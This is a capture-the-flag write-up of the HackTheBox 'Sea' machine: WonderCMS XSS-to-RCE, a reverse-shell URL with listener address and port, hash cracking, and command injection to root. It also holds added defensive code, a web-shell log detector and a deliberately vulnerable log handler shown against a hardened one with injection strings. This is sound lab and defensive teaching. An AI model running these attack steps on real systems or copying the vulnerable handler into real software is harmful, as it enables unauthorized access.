HTB-Sea – Season 6 Writeup


This was a fun box focusing on WonderCMS and CVE-2023-41425.

Enumeration

The initial scan with nmap and rustscan revealed two open ports:

  • Port 22: Running OpenSSH 8.2p1 (Ubuntu).
  • Port 80: Hosting an Apache 2.4.41 web server.

Since OpenSSH was up-to-date, I decided to focus on the web server for potential entry points. Brute-forcing SSH credentials seemed risky due to potential rate-limiting, so I shifted my attention to port 80.


Website Exploration

Directory Enumeration

Using tools like dirsearch and gobuster, I discovered several directories:

  • /themes/
  • /messages/
  • /plugins/
  • /home

However, I realized that many of these directories were also visible in the website’s source code, along with additional pages like /contact.php.

Manual Inspection

After testing for common vulnerabilities like XSS and SSRF on the contact form without success, I turned my attention to the /themes/ directory.


Foothold

Discovering WonderCMS

In the /themes/bike/ directory, I found two key files:

  • README.md: Described the “bike” theme for WonderCMS.
  • version: Revealed the CMS version as 3.2.0.

This confirmed the site was running WonderCMS, which I knew had publicly known vulnerabilities.


Exploitation

Researching Vulnerabilities

A quick search revealed that WonderCMS 3.2.0 had an authenticated Remote Code Execution (RCE) vulnerability. However, I didn't have admin credentials, so I looked for an unauthenticated exploit.

I found an article detailing a Cross-Site Scripting (XSS) vulnerability that could lead to RCE. The exploit involved:

  1. Generating a malicious xss.js file containing a PHP reverse shell.
  2. Sending a crafted URL to the target to trigger the XSS.
  3. Waiting for an admin to interact with the malicious link, which would execute the reverse shell.

Triggering the Exploit

After setting up the exploit, I navigated to the following URL to trigger the RCE:


http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.132&lport=1234

This granted me a shell as www-data.
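From the defender's side, the request above is exactly the kind of artifact an Apache access log retains: a PHP file served from a theme directory that should not exist, with reverse-shell listener parameters in the query string. The following detection script is an added example and not part of the original writeup; the log lines are constructed for this example, and the assumption that "bike" is the only legitimately installed theme is mine.

```python
"""Flag access-log requests that look like a web shell dropped under a CMS theme
directory (pattern from this box: /themes/<dir>/rev.php?lhost=...&lport=...).
Added example; the log lines below are constructed, not captured from the box."""
import re
from urllib.parse import parse_qs, urlsplit

# Minimal parse of the Apache combined log fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumption for this example: "bike" is the only theme the site should have.
KNOWN_THEMES = {"bike"}
# Query parameter names that commonly name a reverse-shell listener.
LISTENER_PARAMS = {"lhost", "lport"}

# Constructed sample log: benign traffic plus one web-shell invocation.
SAMPLE_LOG = """\
10.10.14.132 - - [10/Aug/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 3120
10.10.14.132 - - [10/Aug/2024:10:01:10 +0000] "GET /themes/bike/css/style.css HTTP/1.1" 200 5120
10.10.14.132 - - [10/Aug/2024:10:03:44 +0000] "GET /themes/revshell-main/rev.php?lhost=10.10.14.132&lport=1234 HTTP/1.1" 200 0
10.10.14.132 - - [10/Aug/2024:10:04:00 +0000] "GET /contact.php HTTP/1.1" 200 2210
"""


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_theme_requests(log_text, known_themes=KNOWN_THEMES):
    """Return one record per request under /themes/ that trips at least one rule:
    unknown theme directory, direct request for a PHP file, or listener params."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        parts = url.path.strip("/").split("/")
        if len(parts) < 2 or parts[0] != "themes":
            continue
        theme, leaf = parts[1], parts[-1]
        reasons = []
        if theme not in known_themes:
            reasons.append("unknown_theme_dir")
        if leaf.lower().endswith(".php"):
            reasons.append("php_under_theme")
        if {k.lower() for k in parse_qs(url.query)} & LISTENER_PARAMS:
            reasons.append("listener_params")
        if reasons:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                         "target": rec["target"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in suspicious_theme_requests(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["target"], ",".join(hit["reasons"]))
```

Run against a real access log by feeding the file contents to suspicious_theme_requests; the benign theme asset (style.css under the known theme) produces no hit, while the rev.php request trips all three rules. A file-integrity check on the themes directory would catch the same event earlier, before the shell is ever requested.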


Privilege Escalation

Enumerating Users

Checking /etc/passwd, I found three users with login shells:

  • root
  • amay
  • geo

Cracking the Hash

In the /var/www/sea/ directory, I discovered a database.js file containing a bcrypt hash. Using hashcat, I cracked the hash to reveal the password for the amay user.

Accessing amay

With the credentials:

  • Username: amay
  • Password: <REDACTED>

I gained SSH access to the machine as amay.


Pivoting to Root

Discovering Internal Services

While enumerating, I noticed two services running locally:

  • Port 8080: A web-based system management tool.
  • Port 34337: Another HTTP service.

Port Forwarding

I forwarded port 8080 to my local machine to inspect it further. The service required authentication, but I used amay's credentials to log in.

Exploiting Command Injection

The “Analyze Logs” feature on the internal service was vulnerable to command injection. By injecting commands into the log_file parameter, I executed a reverse shell as root.
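The root cause here is a log-file name reaching a shell unvalidated. The snippet below is an added example, not the box's actual service code: it places a deliberately vulnerable "analyze logs" handler beside a hardened one that allowlists the file name, refuses to leave the log directory, and runs tail as an argv list with no shell. The log directory, the allowlist and the line count are assumptions made for the example.

```python
"""Command injection in a log_file parameter: vulnerable handler vs. hardened one.
Added example with assumed paths and allowlist; not the internal service's own code."""
import subprocess
import tempfile
from pathlib import Path

ALLOWED_LOGS = {"access.log", "error.log"}   # assumption: the only logs the tool may show
SHELL_META = set(";|&$`<>\n")                # used only to explain why a value was rejected


def analyze_logs_vulnerable(log_file, log_dir="/var/log/app"):
    """'Before': the parameter is spliced into a shell string, so a value such as
    'access.log; id' runs id. Kept here only to contrast with the hardened version."""
    cmd = f"tail -n 50 {log_dir}/{log_file}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_log_name(log_file, allowed=ALLOWED_LOGS):
    """Accept only an exact allowlisted name; anything else is rejected with a hint."""
    if log_file not in allowed:
        bad = sorted(c for c in log_file if c in SHELL_META)
        hint = f" (contains shell metacharacters: {bad})" if bad else ""
        raise ValueError(f"log_file {log_file!r} not in allowlist{hint}")
    return log_file


def analyze_logs_hardened(log_file, log_dir, n=50):
    """'After': allowlisted name, path pinned inside log_dir, argv list with shell=False."""
    name = validate_log_name(log_file)
    base = Path(log_dir).resolve()
    path = (base / name).resolve()
    if path.parent != base:                 # defence in depth against traversal
        raise ValueError("log path escapes log directory")
    # No shell is involved: each argv element is passed to tail as-is.
    result = subprocess.run(["tail", "-n", str(n), str(path)],
                            capture_output=True, text=True, check=True)
    return result.stdout


def demo():
    """Exercise the hardened handler on a constructed log and two hostile inputs."""
    with tempfile.TemporaryDirectory() as d:
        log_dir = Path(d)
        (log_dir / "access.log").write_text(
            "".join(f"line {i}\n" for i in range(1, 101)))
        tail = analyze_logs_hardened("access.log", log_dir, n=3)
        outcomes = {}
        for payload in ("access.log; id", "../../etc/passwd"):
            try:
                analyze_logs_hardened(payload, log_dir)
                outcomes[payload] = "accepted"
            except ValueError:
                outcomes[payload] = "rejected"
    return {"tail": tail, "outcomes": outcomes}


if __name__ == "__main__":
    print(demo())
```

The allowlist alone closes the injection; the argv form matters because it also protects any future code path that accepts names outside the allowlist, and the path check catches traversal if the allowlist is ever loosened to a pattern.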


Conclusion

This challenge was a great exercise in web application exploitation and privilege escalation. Key takeaways:

  1. Always Check for Known Vulnerabilities: The XSS-to-RCE exploit was the key to initial access.
  2. Lateral Movement is Crucial: Cracking the admin hash allowed me to pivot to amay.
  3. Command Injection is Powerful: A simple injection in the internal service led to root access.

Thanks for reading, and happy hacking!
